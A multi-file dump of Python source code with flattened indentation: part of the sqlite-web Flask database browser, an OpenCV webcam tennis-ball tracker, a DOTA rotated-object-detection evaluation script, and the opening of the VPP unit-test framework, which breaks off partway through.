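# a statement like 'CREATE TABLE "user" (id INTEGER PRIMARY KEY, name TEXT)',
# _format_create_table() reflows the column list so that each column
# definition sits on its own indented line between the parentheses.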
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
    except Exception:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': bool(app.config.get('PASSWORD')),
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
class PrefixMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = '/%s' % prefix.strip('/')
self.prefix_len = len(self.prefix)
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][self.prefix_len:]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
            start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['URL does not match application prefix.'.encode()]
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=8080,
help='Port for web interface, default=8080',
type='int')
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
help='Host for web interface, default=127.0.0.1')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
parser.add_option(
'-x',
'--no-browser',
action='store_false',
default=True,
dest='browser',
help='Do not automatically open browser page.')
parser.add_option(
'-P',
'--password',
action='store_true',
dest='prompt_password',
help='Prompt for password to access database browser.')
parser.add_option(
'-r',
'--read-only',
action='store_true',
dest='read_only',
help='Open database in read-only mode.')
parser.add_option(
'-u',
'--url-prefix',
dest='url_prefix',
help='URL prefix for application.')
ssl_opts = optparse.OptionGroup(parser, 'SSL options')
ssl_opts.add_option(
'-c',
'--ssl-cert',
dest='ssl_cert',
help='SSL certificate file path.')
ssl_opts.add_option(
'-k',
'--ssl-key',
dest='ssl_key',
help='SSL private key file path.')
ssl_opts.add_option(
'-a',
'--ad-hoc',
action='store_true',
dest='ssl_ad_hoc',
help='Use ad-hoc SSL context.')
parser.add_option_group(ssl_opts)
return parser
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
def install_auth_handler(password):
app.config['PASSWORD'] = password
@app.before_request
def check_password():
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('You must log-in to view the database browser.', 'danger')
session['next_url'] = request.base_url
return redirect(url_for('login'))
def initialize_app(filename, read_only=False, password=None, url_prefix=None):
global dataset
global migrator
if password:
install_auth_handler(password)
if read_only:
if sys.version_info < (3, 4, 0):
die('Python 3.4.0 or newer is required for read-only access.')
if peewee_version < (3, 5, 1):
die('Peewee 3.5.1 or newer is required for read-only access.')
db = SqliteDatabase('file:%s?mode=ro' % filename, uri=True)
try:
db.connect()
except OperationalError:
die('Unable to open database file in read-only mode. Ensure that '
'the database exists in order to use read-only mode.')
db.close()
dataset = SqliteDataSet(db, bare_fields=True)
else:
dataset = SqliteDataSet('sqlite:///%s' % filename, bare_fields=True)
if url_prefix:
app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix=url_prefix)
migrator = dataset._migrator
dataset.close()
def main():
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not args:
die('Error: missing required path to database file.')
password = None
if options.prompt_password:
if os.environ.get('SQLITE_WEB_PASSWORD'):
password = os.environ['SQLITE_WEB_PASSWORD']
else:
while True:
password = getpass('Enter password: ')
password_confirm = getpass('Confirm password: ')
if password != password_confirm:
print('Passwords did not match!')
else:
break
# Initialize the dataset instance and (optionally) authentication handler.
initialize_app(args[0], options.read_only, password, options.url_prefix)
if options.browser:
open_browser_tab(options.host, options.port)
if password:
key = b'sqlite-web-' + args[0].encode('utf8') + password.encode('utf8')
app.secret_key = hashlib.sha256(key).hexdigest()
# Set up SSL context, if specified.
kwargs = {}
if options.ssl_ad_hoc:
kwargs['ssl_context'] = 'adhoc'
if options.ssl_cert and options.ssl_key:
if not os.path.exists(options.ssl_cert) or not os.path.exists(options.ssl_key):
die('ssl cert or ssl key not found. Please check the file-paths.')
kwargs['ssl_context'] = (options.ssl_cert, options.ssl_key)
elif options.ssl_cert:
die('ssl key "-k" is required alongside the ssl cert')
elif options.ssl_key:
die('ssl cert "-c" is required alongside the ssl key')
# Run WSGI application.
app.run(host=options.host, port=options.port, debug=options.debug, **kwargs)
if __name__ == '__main__':
main()
|
camera.py
|
from threading import Thread
import cv2
from balltrack import track_tennis_ball
delay = 30
class Camera:
def __init__(self, id=0, height=720, width=1280, fps=30):
self.cap = cv2.VideoCapture(id)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
w = self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)
h = self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
print(w,h)
self.success, self.image = self.cap.read()
self.stopped = False
def update(self):
while True:
if self.stopped:
return
self.success, image = self.cap.read()
            self.image = image  # [180:900, 320:1600]
def start(self):
Thread(target=self.update, args=()).start()
def read_rgb(self):
image = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)
return self.success, image
def release(self):
self.stopped = True
self.cap.release()
def get_jpg(self):
        return cv2.imencode('.jpg', self.image)[1].tobytes()
class TrackingCameraRunner():
def __init__(self, camera=0):
self.tracker = cv2.TrackerKCF_create()
self.tracking = False
self.camera = Camera(camera)
self.camera.start()
self.frame = None
#self.faces = Faces()
self.im = None
def close(self):
self.camera.release()
cv2.destroyAllWindows()
def track_tennis_ball(self):
center, radius = track_tennis_ball(self.frame)
if center is not None:
cv2.circle(self.frame, (int(center[0]), int(center[1])), int(radius),
(0, 255, 255), 2)
cv2.circle(self.frame, center, 5, (0, 0, 255), -1)
return center, radius
def step_frame(self):
ret, frame = self.camera.read_rgb()
if ret is True:
self.frame = frame
def get_jpg(self):
        return cv2.imencode('.jpg', cv2.cvtColor(self.frame, cv2.COLOR_RGB2BGR))[1].tobytes()
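# Hedged usage sketch (assumes a webcam at index 0 and the balltrack helper):
#
#   runner = TrackingCameraRunner(camera=0)
#   runner.step_frame()
#   center, radius = runner.track_tennis_ball()
#   jpg_bytes = runner.get_jpg()
#   runner.close()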
|
test_dota_r3det.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from data.io.image_preprocess import short_side_resize_for_inference_data
from libs.networks import build_whole_network_r3det
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.coordinate_convert import forward_convert, backward_convert
from libs.box_utils import nms_rotate
from libs.box_utils.rotate_polygon_nms import rotate_gpu_nms
def worker(gpu_id, images, det_net, args, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
img_batch = short_side_resize_for_inference_data(img_tensor=img_batch,
target_shortside_len=cfgs.IMG_SHORT_SIDE_LEN,
length_limitation=cfgs.IMG_MAX_LENGTH)
if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch_h=None,
gtboxes_batch_r=None)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
        if restorer is not None:
restorer.restore(sess, restore_ckpt)
            print('restore model on gpu %d ...' % gpu_id)
for img_path in images:
# if 'P0016' not in img_path:
# continue
img = cv2.imread(img_path)
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
if imgH < args.h_len:
temp = np.zeros([args.h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = args.h_len
if imgW < args.w_len:
temp = np.zeros([imgH, args.w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = args.w_len
for hh in range(0, imgH, args.h_len - args.h_overlap):
if imgH - hh - 1 < args.h_len:
hh_ = imgH - args.h_len
else:
hh_ = hh
for ww in range(0, imgW, args.w_len - args.w_overlap):
if imgW - ww - 1 < args.w_len:
ww_ = imgW - args.w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + args.h_len), ww_:(ww_ + args.w_len), :]
resized_img, det_boxes_r_, det_scores_r_, det_category_r_ = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: src_img[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
det_boxes_r_ = backward_convert(det_boxes_r_, False)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0] = box_rotate[0] + ww_
box_rotate[1] = box_rotate[1] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.05, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3}
for sub_class in range(1, cfgs.CLASS_NUM + 1):
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_boxes_r = np.array(tmp_boxes_r)
tmp = np.zeros([tmp_boxes_r.shape[0], tmp_boxes_r.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r
tmp[:, -1] = np.array(tmp_score_r)
try:
inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r),
scores=np.array(tmp_score_r),
iou_threshold=threshold[LABEL_NAME_MAP[sub_class]],
max_output_size=500)
except:
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r.shape[0], tmp_boxes_r.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[LABEL_NAME_MAP[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(det_net, real_test_img_list, args, txt_name):
save_path = os.path.join('./test_dota', cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, args, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.mkdir(os.path.join(save_path, 'dota_img_vis'))
draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_indices = res['scores'] >= cfgs.VIS_SCORE
detected_scores = res['scores'][detected_indices]
detected_boxes = res['boxes'][detected_indices]
detected_categories = res['labels'][detected_indices]
final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
CLASS_DOTA = NAME_LABEL_MAP.keys()
write_handle = {}
tools.mkdir(os.path.join(save_path, 'dota_res'))
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
rboxes = forward_convert(res['boxes'], with_label=False)
for i, rbox in enumerate(rboxes):
command = '%s %.3f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
res['scores'][i],
rbox[0], rbox[1], rbox[2], rbox[3],
rbox[4], rbox[5], rbox[6], rbox[7],)
write_handle[LABEL_NAME_MAP[res['labels'][i]]].write(command)
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class].close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def eval(num_imgs, args):
txt_name = '{}.txt'.format(cfgs.VERSION)
if not args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************'*3)
print('Already tested imgs:', img_filter)
print('****************************'*3)
fr.close()
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
    assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
                                        ' Note that we only support img formats (.jpg, .jpeg, .png, .tif, .tiff)'
if num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: num_imgs]
retinanet = build_whole_network_r3det.DetectionNetwork(base_network_name=cfgs.NET_NAME,
is_training=False)
test_dota(det_net=retinanet, real_test_img_list=real_test_img_list, args=args, txt_name=txt_name)
if not args.show_box:
os.remove(txt_name)
def parse_args():
parser = argparse.ArgumentParser('evaluate the result.')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/dataset/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--eval_num', dest='eval_num',
help='the num of eval imgs',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=600, type=int)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=600, type=int)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=150, type=int)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=150, type=int)
args = parser.parse_args()
return args
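# Hedged CLI sketch (paths are placeholders): evaluate a directory of images
# on two GPUs and write visualisations of the detections; omit -s to write the
# Task1_*.txt result files instead.
#
#   python test_dota_r3det.py --test_dir /path/to/images --gpus 0,1 -s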
if __name__ == '__main__':
args = parse_args()
print(20*"--")
print(args)
print(20*"--")
eval(args.eval_num,
args=args)
|
framework.py
|
#!/usr/bin/env python3
from __future__ import print_function
import gc
import logging
import sys
import os
import select
import signal
import subprocess
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
from enum import Enum
from abc import ABC, abstractmethod
import scapy.compat
from scapy.packet import Raw
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
from vpp_papi import VppEnum
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_socket import VppTransportSocketIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
from cpu_config import available_cpus, num_cpus, max_vpp_cpus
logger = logging.getLogger(__name__)
# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
SKIP_CPU_SHORTAGE = 5
class BoolEnvironmentVariable(object):
def __init__(self, env_var_name, default='n', true_values=None):
self.name = env_var_name
self.default = default
self.true_values = true_values if true_values is not None else \
("y", "yes", "1")
def __bool__(self):
return os.getenv(self.name, self.default).lower() in self.true_values
if sys.version_info[0] == 2:
__nonzero__ = __bool__
def __repr__(self):
return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % \
(self.name, self.default, self.true_values)
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = ' while running %s.%s' % (testcase, method_name)
if self.rv:
msg = "VPP subprocess died unexpectedly%s with return code: %d%s."\
% (in_msg, self.rv, ' [%s]' %
(self.signal_name if
self.signal_name is not None else ''))
else:
msg = "VPP subprocess died unexpectedly%s." % in_msg
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
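    # Reads that do not end with a newline are kept in stdout_fragment /
    # stderr_fragment and prepended to the next read, so only complete lines
    # are stored in the deques and logged.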
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.info(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.error(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
def _is_skip_aarch64_set():
return BoolEnvironmentVariable('SKIP_AARCH64')
is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
return BoolEnvironmentVariable("EXTENDED_TESTS")
running_extended_tests = _running_extended_tests()
def _running_gcov_tests():
return BoolEnvironmentVariable("GCOV_TESTS")
running_gcov_tests = _running_gcov_tests()
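# Note: is_skip_aarch64_set, running_extended_tests and running_gcov_tests are
# BoolEnvironmentVariable instances, so their truthiness re-reads the
# environment each time they are evaluated in a boolean context.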
def get_environ_vpp_worker_count():
worker_config = os.getenv("VPP_WORKER_CONFIG", None)
if worker_config:
elems = worker_config.split(" ")
if elems[0] != "workers" or len(elems) != 2:
raise ValueError("Wrong VPP_WORKER_CONFIG == '%s' value." %
worker_config)
return int(elems[1])
else:
return 0
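# Illustrative example (sketch):
#
#   os.environ["VPP_WORKER_CONFIG"] = "workers 2"
#   assert get_environ_vpp_worker_count() == 2
#
# An unset variable yields 0; a set value must have the form "workers <n>".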
environ_vpp_worker_count = get_environ_vpp_worker_count()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class TestCaseTag(Enum):
# marks the suites that must run at the end
# using only a single test runner
RUN_SOLO = 1
# marks the suites broken on VPP multi-worker
FIXME_VPP_WORKERS = 2
def create_tag_decorator(e):
def decorator(cls):
try:
cls.test_tags.append(e)
except AttributeError:
cls.test_tags = [e]
return cls
return decorator
tag_run_solo = create_tag_decorator(TestCaseTag.RUN_SOLO)
tag_fixme_vpp_workers = create_tag_decorator(TestCaseTag.FIXME_VPP_WORKERS)
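# Illustrative usage (sketch):
#
#   @tag_run_solo
#   class MyTestCase(VppTestCase):
#       """ test case that must run at the end, alone """
#
# The decorator appends TestCaseTag.RUN_SOLO to the class' test_tags list,
# which is later queried through has_tag() / is_tagged_run_solo().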
class DummyVpp:
returncode = None
pid = 0xcafebafe
def poll(self):
pass
def terminate(self):
pass
class CPUInterface(ABC):
cpus = []
skipped_due_to_cpu_lack = False
@classmethod
@abstractmethod
def get_cpus_required(cls):
pass
@classmethod
def assign_cpus(cls, cpus):
cls.cpus = cpus
class VppTestCase(CPUInterface, unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
    classes. It provides methods to create and run test cases.
"""
extra_vpp_statseg_config = ""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def has_tag(cls, tag):
""" if the test case has a given tag - return true """
try:
return tag in cls.test_tags
except AttributeError:
pass
return False
@classmethod
def is_tagged_run_solo(cls):
""" if the test case class is timing-sensitive - return true """
return cls.has_tag(TestCaseTag.RUN_SOLO)
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
cls.debug_attach = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
elif dl == "attach":
cls.debug_attach = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@classmethod
def get_vpp_worker_count(cls):
if not hasattr(cls, "vpp_worker_count"):
if cls.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
cls.vpp_worker_count = 0
else:
cls.vpp_worker_count = environ_vpp_worker_count
return cls.vpp_worker_count
@classmethod
def get_cpus_required(cls):
return 1 + cls.get_vpp_worker_count()
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = BoolEnvironmentVariable('STEP')
# inverted case to handle '' == True
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
default_variant = os.getenv("VARIANT")
if default_variant is not None:
default_variant = "defaults { %s 100 }" % default_variant
else:
default_variant = ""
api_fuzzing = os.getenv("API_FUZZ")
if api_fuzzing is None:
api_fuzzing = 'off'
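        # Assemble the VPP command line: the unix stanza (nodaemon, coredumps,
        # runtime-dir in the per-test tempdir), api-trace/api-segment settings,
        # cpu pinning (main-core plus an optional worker corelist), statseg and
        # socksvr sockets, the node variant, api-fuzz and the plugin
        # enable/disable list.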
cls.vpp_cmdline = [
cls.vpp_bin,
"unix", "{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}",
"api-segment", "{", "prefix", cls.get_api_segment_prefix(), "}",
"cpu", "{", "main-core", str(cls.cpus[0]), ]
if cls.get_vpp_worker_count():
cls.vpp_cmdline.extend([
"corelist-workers", ",".join([str(x) for x in cls.cpus[1:]])])
cls.vpp_cmdline.extend([
"}",
"physmem", "{", "max-size", "32m", "}",
"statseg", "{", "socket-name", cls.get_stats_sock_path(),
cls.extra_vpp_statseg_config, "}",
"socksvr", "{", "socket-name", cls.get_api_sock_path(), "}",
"node { ", default_variant, "}",
"api-fuzz {", api_fuzzing, "}",
"plugins", "{", "plugin", "dpdk_plugin.so", "{", "disable", "}",
"plugin", "rdma_plugin.so", "{", "disable", "}",
"plugin", "lisp_unittest_plugin.so", "{", "enable", "}",
"plugin", "unittest_plugin.so", "{", "enable", "}"
] + cls.extra_vpp_plugin_config + ["}", ])
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
if cls.test_plugin_path is not None:
cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])
if not cls.debug_attach:
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
